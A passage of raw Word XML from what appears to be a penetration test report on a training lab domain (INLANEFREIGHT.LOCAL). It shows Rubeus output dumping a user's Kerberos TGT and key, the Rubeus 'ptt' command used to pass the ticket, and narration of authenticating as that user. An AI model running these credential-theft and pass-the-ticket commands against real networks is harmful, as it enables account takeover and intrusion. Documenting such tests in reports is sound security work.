          <w:p w14:paraId="431C6027"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_____) )_   _| |__  _____ _   _  ___</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32A1984D"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  __  /| | | |  _ \| ___ | | | |/___)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C5C9D88"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 |  \ \| |_| | |_) ) ____| |_| |___ |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08146943"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|_|   |_|____/|____/|_____)____/(___/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1216F6C0" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1604DB33"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v2.0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5359F6E3" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D61479E" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58055A7A" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Action: Dump Kerberos Ticket Data (All Users)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="606CF19B" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4E7DA7BE" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[*] Target service  : krbtgt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4598F519" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[*] Target LUID     : 0x1a8b19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17FF8817" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[*] Current LUID    : 0x256aef</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4114A330" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4FC53131"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UserName                 : pramirez</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AFD0CF3"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Domain                   : INLANEFREIGHT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38E6B28D"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LogonId                  : 0x1a8b19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="055C90C3"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UserSID                  : S-1-5-21-1666128402-2659679066-1433032234-1108</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B2A2B88"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AuthenticationPackage    : Negotiate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BD4DE11"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LogonType                : RemoteInteractive</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20580DF7"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LogonTime                : 5/14/2022 8:21:35 AM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D1C83C3"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LogonServer              : DC01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F7B12B"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LogonServerDNSDomain     : INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E54BD07" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  UserPrincipalName        : pramirez@INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03E47982" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F161A09" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3DF1B2BF" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    ServiceName              :  krbtgt/INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C631D61" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    ServiceRealm             :  INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="016B03D5" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    UserName                 :  pramirez</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="017EC3F2" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    UserRealm                :  INLANEFREIGHT.LOCAL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="772FCBEA" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    StartTime                :  5/15/2022 3:51:35 AM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FAED3C3" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    EndTime                  :  5/15/2022 1:51:35 PM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70FEEC2E" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    RenewTill                :  5/21/2022 8:21:35 AM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB782CA" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="612176BE" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    KeyType                  :  aes256_cts_hmac_sha1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BD53E7F" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Base64(key)              :  3g/++VoJZ4ipbExARBCKK960cN+3juTKNHiQ8XpHL/k=</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ECB886C" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Base64EncodedTicket   :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="013D5B80" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29EBDCD2" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      doIFZDCCBWCgAwIBBaEDAgEWooIEVDCCBFBhgg&lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58833B48" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D861A14" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">   ______        _</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CA3360C" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  (_____ \      | |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C5D60D1" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">   _____) )_   _| |__  _____ _   _  ___</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="255838CC" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  |  __  /| | | |  _ \| ___ | | | |/___)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4487C226" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  | |  \ \| |_| | |_) ) ____| |_| |___ |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2730160E" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  |_|   |_|____/|____/|_____)____/(___/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ACAE04A" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="540B627B" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  v2.0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53CDDC3A" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B868B38" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="13979746" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[*] Action: Import Ticket</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73BBBDD9" w14:textId="5164EA3A" w:rsidR="003D5536" w:rsidRDefault="006E291D" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[+] Ticket successfully imported!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="366B966E" w14:textId="245EB557" w:rsidR="003D5536" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Dumping Kerberos Ticket Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A3DBE" w14:textId="384338DE" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006E291D">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00A40765">
        <w:t>tester</w:t>
      </w:r>
      <w:r w:rsidRPr="006E291D">
        <w:t xml:space="preserve"> performed the pass-the-ticket attack and successfully authenticated as the </w:t>
      </w:r>
      <w:r w:rsidRPr="006E291D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>pramirez </w:t>
      </w:r>
      <w:r w:rsidRPr="006E291D">
        <w:t>user.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D5536" w14:paraId="10D2C725" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="432F8374" w14:textId="277A91A2" w:rsidR="00A40765" w:rsidRPr="00A40765" w:rsidRDefault="006E291D" w:rsidP="004539C5">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">PS C:\htb&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>.\Rubeus.exe ptt /ticket:doIFZDCCBWCgAwIBBaEDAgEWo&lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="012E8D4B" w14:textId="2C4170B8" w:rsidR="003D5536" w:rsidRDefault="00A40765" w:rsidP="00A40765">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Performing Pass-the-Ticket Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EAB211" w14:textId="2A105A05" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="006E291D">
        <w:t>This was confirmed using the </w:t>
      </w:r>
      <w:r w:rsidRPr="006E291D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>klist </w:t>
      </w:r>
      <w:r w:rsidRPr="006E291D">
        <w:t>command to view cached Kerberos tickets in the current session.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D5536" w14:paraId="115BC023" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19B45129" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">PS C:\htb&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>klist</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="359A5B40" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7DAB796B" w14:textId="77777777" w:rsidR="006E291D" w:rsidRPr="006E291D" w:rsidRDefault="006E291D" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E291D">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
